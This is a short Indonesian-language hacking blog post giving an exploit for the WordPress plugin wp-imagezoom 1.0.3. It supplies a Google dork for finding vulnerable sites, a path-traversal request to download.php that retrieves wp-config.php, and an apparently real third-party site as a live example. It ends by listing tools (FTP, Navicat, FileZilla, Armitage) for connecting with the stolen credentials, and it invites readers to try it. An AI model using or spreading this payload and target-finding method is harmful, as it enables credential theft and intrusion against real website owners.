Exploit wp-imagezoom.1.0.3 Remote File Disclosure

Lagi main reduniverse.com , bosan ga ada siapa-siapa.. anak-anak pada sibuk sendiri, yaudah we postingin ini, lumayan juga nih buat di coba, :D . Emang ga terlalu banyak nih targetnya kalau kata saya , tadi dah ngedork di google. Oke coba aja deh..

Dork :
inurl:/wp-content/plugins/wp-imagezoom/
Exploit :
wp-content/plugins/wp-imagezoom/download.php?file=../../../wp-config.php
Example : 
http://estanciarural.com/anuncio/wp-content/plugins/wp-imagezoom/download.php?file=../../../wp-config.php
Download, dan lihat Confignya. :D

Gimana donk konekin nya :
Sebenernya tergantung port yang kebuka sih menurut informasi sekitar, bisa menggunakan beberapa cara ini :
- Menggunakan ftp
- Menggunakan navicat for mysql
- Filezilla
- Menggunakan armitage ( bila anda menggunakan backtrack / blackbuntu ).